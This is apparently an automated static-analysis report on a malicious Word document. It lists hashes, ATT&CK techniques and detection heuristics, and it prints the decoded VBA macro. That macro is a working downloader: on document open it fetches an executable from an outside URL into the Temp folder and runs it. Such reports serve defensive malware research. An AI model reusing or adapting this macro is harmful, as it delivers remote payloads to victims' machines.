Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 af899216a30c43a0…

MALICIOUS

Office (OOXML)

39.8 KB Created: 2014-05-19 22:09:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2015-01-15
MD5: 4beaff0e8d6df2981848c3a6853c88e3 SHA-1: 618f9c63cee71fa70f8f6718e69a76c2b31b420e SHA-256: af899216a30c43a00cccb00826d6a743286a668f630f1c8906c3a30f1ef85169
366 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The AutoOpen macro attempts to download a second-stage executable from the URL 'http://ge.tt/api/1/files/6ar7Lg42/0/blob?download' using URLDownloadToFile and then executes it using Shell. This indicates a downloader functionality, commonly used to fetch further malicious payloads.

Heuristics 10

  • ClamAV: Doc.Downloader.Sload-6961205-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6961205-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell WHERE, vbNormalFocus
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
        Shell WHERE, vbNormalFocus
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        WHERE = Environ("Temp") & "\" & Pwd(5) & ".exe"
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://ge.tt/api/1/files/6ar7Lg42/0/blob?downloadReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1557 bytes
SHA-256: bc24a2b8acb54b4b3c1707caaf10d23cbb0c7f656712d29b3fabfd6ea6a2f9ce
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
        (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
    
Sub AutoOpen()
    URL$ = "http://ge.tt/api/1/files/6ar7Lg42/0/blob?download"
    WHERE = Environ("Temp") & "\" & Pwd(5) & ".exe"
    DownloadStatus = URLDownloadToFile(0, URL, WHERE, 0, 0)
    Shell WHERE, vbNormalFocus
End Sub

Sub Document_Open()

End Sub

Function Pwd(iLength As Integer) As String
    Dim i As Integer, iTemp As Integer, bOK As Boolean, strTemp As String
    For i = 1 To iLength
        Do
            iTemp = Int((122 - 48 + 1) * Rnd + 48)
            Select Case iTemp
            Case 48 To 57, 65 To 90, 97 To 122: bOK = True
            Case Else: bOK = False
            End Select
        Loop Until bOK = True
        bOK = False
        strTemp = strTemp & Chr(iTemp)
    Next i
    Pwd = strTemp
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9728 bytes
SHA-256: 1c5cf6ab26d4fcec6d1665db263b2b8b47f6fbf2a1e53a31404b4b38919319d7
Detection
ClamAV: Doc.Downloader.Sload-6961205-0
Obfuscation or payload: unlikely